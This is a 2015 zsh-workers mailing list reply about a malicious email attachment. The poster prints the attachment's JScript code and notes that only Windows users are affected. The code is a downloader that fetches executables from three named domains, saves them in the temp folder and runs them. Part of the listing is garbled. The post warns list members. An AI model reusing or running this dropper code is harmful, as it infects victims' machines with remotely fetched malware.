Zsh Mailing List Archive
Messages sorted by: Reverse Date, Date, Thread, Author

Re: zsh-workers/37266 has a malicious attachment



On 2015.12.01 at 12:24 +0000, Peter Stephenson wrote:
> ...probably obvious enough to everyone here, but as it got flagged up by
> our email system I thought it was worth reporting more widely.
> Subject line is "Your e-ticket #0000228935".

Only Windows users are attacked. Here is the code:

var b = "itechgalaxyapps.com mybeautypedia.com kindernestmumbai.com".split(" ");
var ws = WScript.CreateObject("WScript.Shell");
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + "750083";
var xo = WScript.CreateObject("MSXML2.XMLHTTP");
var xa = WScript.CreateObject("ADODB.Stream");
var ld = 0;
for (var n = 1; n <= 3; n++) {
    for (var i = ld; i 1000) {
        dn = 1;
        xa.position = 0;
        xa.saveToFile(fn + n + ".exe", 2);
        try {
            ws.Run(fn + n + ".exe", 1, 0);
        } catch (er) {};
    };
    xa.close();
};
if (dn == 1) {
    ld = i;
    break;
};
} catch (er) {};
};
};

-- 
Markus



Messages sorted by: Reverse Date, Date, Thread, Author